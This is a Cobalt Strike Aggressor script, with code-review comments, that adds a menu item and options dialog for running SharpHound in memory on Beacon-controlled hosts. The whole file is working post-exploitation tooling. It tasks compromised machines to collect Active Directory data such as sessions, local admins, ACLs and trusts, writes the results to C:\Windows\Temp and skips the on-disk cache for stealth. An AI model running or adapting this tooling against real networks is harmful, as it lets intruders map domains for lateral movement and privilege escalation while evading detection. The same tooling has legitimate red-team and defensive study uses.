# SharpHound Aggressor Script
# Author: @captmeelo
# Blog: https://captmeelo.com/
# GitHub: https://github.com/capt-meelo
# Location of the SharpHound binary on the machine running the Cobalt Strike
# client. This path is handed to bexecute_assembly() as the assembly to load,
# so it must match the local install; the script does not check that the file
# exists before tasking.
$assembly = "C:\\tools\\SharpCollection\\NetFramework_4.5_x64\\SharpHound.exe";
# Hook into the Beacon context menu: adds one "SharpHound" entry.
# $1 is the Beacon ID selection supplied by the menu; it is forwarded
# unchanged to runSharpHound(), which builds the options dialog.
popup beacon_bottom {
	item "SharpHound" {
		runSharpHound($1);
	}
}
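# Build and show the SharpHound options dialog for the selected Beacon(s).
# When the operator presses "Run", the callback assembles the SharpHound
# argument string from the dialog values and tasks the Beacon(s) with
# execute-assembly of $assembly.
#
# $1 - Beacon ID selection passed in by the popup menu.
#
# Sleep variables are global unless declared otherwise. The original kept the
# Beacon ID in a global $bid that the callback read later, so opening the
# dialog for a second Beacon before pressing "Run" on the first would task the
# wrong host. The ID is now bound into the callback's own scope and every
# working variable is declared local.
sub runSharpHound {
	local('$dialog');

	$dialog = dialog("SharpHound", %(collectionmethod => "Default", outputdir => "C:\\Windows\\Temp\\"), lambda({
		# Callback arguments: $3 is the dictionary of dialog values.
		local('$collectionmethod $domain $stealth $outputdir $command');

		$collectionmethod = $3["collectionmethod"];

		# Optional target domain; omitted from the command line when unset.
		if ($3["domain"] ne $null) {
			$domain = $3["domain"];
			$domain = "--Domain $domain";
		} else {
			$domain = "";
		}

		# The checkbox value is compared against the string "true".
		$stealth = iff($3["stealth"] eq "true", "--Stealth", "");

		# Directory handed to SharpHound's --OutputDirectory option.
		# NOTE(review): the value is inserted unquoted, so a path containing
		# spaces would presumably be split into several arguments - confirm.
		if ($3["outputdir"] ne $null) {
			$outputdir = $3["outputdir"];
			$outputdir = "--OutputDirectory $outputdir";
		} else {
			$outputdir = "";
		}

		# --NoSaveCache is always passed (see the dialog description below).
		$command = "--CollectionMethod $collectionmethod $domain --NoSaveCache $stealth $outputdir";

		# binput() records the equivalent console command in the Beacon
		# console and logs, so the tasking stays visible in the operator
		# audit trail.
		binput($bid, "execute-assembly $assembly $command");
		bexecute_assembly($bid, $assembly, $command);
	}, $bid => $1));

	dialog_description($dialog, "Execute SharpHound without saving cache file to disk for OPSEC.");
	drow_combobox($dialog, "collectionmethod", "Collection Method:", @("All,GPOLocalGroup", "All", "Default", "Group", "LocalAdmin", "RDP", "DCOM", "PSRemote", "GPOLocalGroup", "Session", "ComputerOnly", "LoggedOn", "Trusts", "ACL", "Container", "DcOnly", "ObjectProps"));
	drow_text($dialog, "domain", "Domain: ");
	drow_text($dialog, "outputdir", "Output Directory: ");
	drow_checkbox($dialog, "stealth", "Stealth Mode: ", "Enable");
	dbutton_action($dialog, "Run");
	dbutton_help($dialog, "https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html");
	dialog_show($dialog);
}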